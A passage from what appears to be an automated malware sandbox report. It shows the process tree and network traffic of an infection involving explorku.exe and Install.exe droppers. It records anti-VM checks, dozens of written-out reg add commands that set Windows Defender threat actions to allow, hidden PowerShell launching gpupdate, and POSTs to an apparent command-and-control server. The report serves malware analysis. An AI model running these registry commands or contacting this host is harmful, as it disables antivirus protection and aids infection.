                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
                                                                                                                                                        1⤵
                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:984
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3592 -ip 3592
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1532
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS3F51.tmp\Install.exe it /WWMdidCFzX 385118 /S
                                                                                                                                                          1⤵
                                                                                                                                                            PID:5544
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5232
                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5452
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5444
                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:224
                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6112
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:6080
                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5712
                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:5372
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:916
                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:5800
                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5184
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:4004
                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3872
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5696
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:5496
                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:5420
                                                                                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:440
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                               powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:5876
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:5904
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:5372
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5164
                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:4748
                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5236
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1588
                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5772
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:2916
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
          3⤵
            PID:5312
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:3644
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
          3⤵
            PID:5916
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:4540
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
          3⤵
            PID:3036
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:2300
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
          3⤵
            PID:5792
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:2780
• C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe
  C:\Users\Admin\AppData\Local\Temp\7zS4F01.tmp\Install.exe it /DXFdidLDYA 385118 /S
  1⤵
    PID:5188
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      2⤵
        PID:5356
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
          3⤵
            PID:5644
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              4⤵
                PID:5428
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  5⤵
                    PID:5832
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
          3⤵
            PID:5396
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              4⤵
                PID:2936
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  5⤵
                    PID:6020
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
          3⤵
            PID:5208
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
              4⤵
                PID:5844
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  5⤵
                    PID:5228
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
          3⤵
            PID:5316
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
              4⤵
                PID:5836
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  5⤵
                    PID:3644
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          3⤵
            PID:2556
            • C:\Windows\SysWOW64\cmd.exe
              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
              4⤵
                PID:5288
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:4992
                    • C:\Windows\SysWOW64\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      6⤵
                        PID:5740
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  1⤵
    PID:6028

Network

• flag-ru
  POST
  http://5.42.96.141/go34ko8/index.php
  explorku.exe
  Remote address:
  5.42.96.141:80
  Request
  POST /go34ko8/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 5.42.96.141
  Content-Length: 4
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Sat, 11 May 2024 22:38:17 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 160
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:17 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:19 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:22 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-ru
                                                                                                                                                                                                                                                                  POST
                                                                                                                                                                                                                                                                  http://5.42.96.141/go34ko8/index.php
                                                                                                                                                                                                                                                                  explorku.exe
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  5.42.96.141:80
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  POST /go34ko8/index.php HTTP/1.1
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Host: 5.42.96.141
                                                                                                                                                                                                                                                                  Content-Length: 31
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                  Date: Sat, 11 May 2024 22:38:26 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  141.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  141.96.42.5.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  104.21.3.125
                                                                                                                                                                                                                                                                  minorittyeffeoos.shop
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  172.67.130.179
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  NWyLerfTdX.NWyLerfTdX
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  NWyLerfTdX.NWyLerfTdX
                                                                                                                                                                                                                                                                  IN A
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  Response
                                                                                                                                                                                                                                                                  77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                                                                  IN PTR
                                                                                                                                                                                                                                                                  a2-18-190-77deploystaticakamaitechnologiescom
                                                                                                                                                                                                                                                                • flag-us
                                                                                                                                                                                                                                                                  DNS
                                                                                                                                                                                                                                                                  onlycitylink.com
                                                                                                                                                                                                                                                                  Remote address:
                                                                                                                                                                                                                                                                  8.8.8.8:53
                                                                                                                                                                                                                                                                  Request
                                                                                                                                                                                                                                                                  onlycitylink.com
